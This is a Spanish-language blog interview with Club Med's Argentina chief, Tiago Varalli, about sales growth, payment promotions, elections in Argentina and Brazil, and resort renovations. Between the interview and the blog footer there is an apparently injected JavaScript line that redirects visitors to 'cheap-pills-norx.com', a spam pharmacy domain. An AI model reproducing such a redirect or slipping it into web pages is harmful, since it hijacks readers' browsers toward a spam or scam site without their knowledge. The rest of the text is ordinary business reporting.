Tiago Varalli, de Club Med: «La Argentina nos enseñó que tenemos que pensar año a año»

Para el CEO del Club Med asegura que la economía local es intensa, pero tiene buenos números de ventas proyectados para este año, con un crecimiento del 10%. Optimista sobre el futuro de los negocios, asegura que los argentinos están enamorados de la propuesta de la cadena all inclusive y eso hace más fácil el trabajo. Además, cuenta las últimas novedades de la cadena, que encaró un ambicioso plan de renovación
Tiago Varalli se siente afortunado y su permanente sonrisa, quizás impulsada por su raigambre cultural, lo demuestra. Este brasileño de 33 años que está a cargo de la continuidad del crecimiento de Club Med en la Argentina supo a los 17 años que quería trabajar en hotelería. Trabajó en la aerolínea TAM y luego en otra cadena hotelera con base en Francia, hasta que entró a Club Med, en 2009. Fanático de los deportes, en 2014 llegó a la Argentina y ayer se quedó a mirar el superclásico, hinchando por que «gane el mejor». Su corazón futbolístico esta en el San Pablo.
¿Cómo está el negocio en la Argentina?
Los argentinos y Med ya tenemos una historia de 30 años. En abril cerramos la temporada de verano con un crecimiento de 10% en relación al año anterior. La expectativa para el invierno es también mantener ese incremento, cerrando el año con una facturación de u$s 20 millones. Pensamos seguir creciendo, aunque sé que no va a ser fácil porque es un año importante para Argentina, pero somos optimistas. El país está en el puesto 12 como consumidor del Club Med, y si quitamos a los países que tienen resorts, queda en el top tres.
¿Por qué creció la demanda este año?
Los argentinos aman viajar. Tienen por costumbre hacer cuatro o cinco viajes por año y ahora hacen dos y, por suerte, y con mucho trabajo del equipo, estamos entre los dos o tres primeros destinos a elegir como producto. Además, cuando empezamos a promocionar en los últimos años otros destinos como los de nieve, exclusivos de Europa, y los de Asia, eso generó curiosidad en la Argentina, y nos tienen como opción.
Ustedes tienen paquetes en pesos, cuotas y promociones…¿esa fue la clave en los últimos años?
Adaptamos nuestro negocio al escenario. Es un modelo que tenemos en América latina, donde tenemos que adaptarnos a cada país. Los argentinos, en los últimos cinco años, cambiaron el concepto de compra, es más impulsiva y de corto plazo. Por eso somos más intensos en promociones y las facilidades de pagos nos ayudan, como herramienta de negocios.
¿Cree que va a influir el resultado de las elecciones presidenciales en el consumo de los próximos años?
Argentina nos enseño que tenemos que pensar año a año. Sudamérica es así en general. Este 2015 es un año importante para reflexionar y pensar cómo queremos el país a futuro. Yo, como compañía, hincho por lo mejor para el país. Como negocio, estamos para ayudar. Tenemos una relación de amor con la Argentina y estamos contentos de estar acá.
Teniendo en cuenta las crisis internacionales de los últimos años, ¿Cambiaron su política de precios?
No cambiamos mucho los precios. Buscamos agregar valor en el concepto. En la temporada de verano, el 85% de nuestros clientes estuvo muy satisfecho y entre el 50% y el 60% de nuestros huéspedes repitieron la experiencia Club Med. Cambiamos el producto, que mejoró como servicio y encontramos una fórmula donde el precio no es prioritario y sí el valor que el viajero busca. Nosotros vendemos felicidad, y la felicidad no tiene precio.
¿Las últimas aperturas crearon una segmentación natural entre los resorts?
En los últimos siete años hicimos, además, una renovación de productos que existían desde hace tiempo, e implementamos nuevos conceptos en productos que ya teníamos. Buscamos agregar servicios a la experiencia de vacaciones que es Club Med (ver aparte).
¿Cómo ve a Brasil hoy?
El país pasa por un momento intenso. Como negocio, continuamos creciendo. Es un momento de reflexión para el país. Tuvimos elecciones en 2014 y es la primera vez, en mis 33 años, que yo vi un país comprometido y preocupado por el futuro. Las elecciones marcaron un momento importante para el país. Los brasileños se unieron para elegir el futuro y lo hicieron, entonces tenemos que apoyar el crecimiento y eso es parte de la democracia. Ojalá tengamos un país que continúe creciendo porque es bueno para Sudamérica. Con Argentina nos queremos como país por eso es importante que los dos países crezcan y puedan tener relaciones como tuvieron y como van a tener en el futuro.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *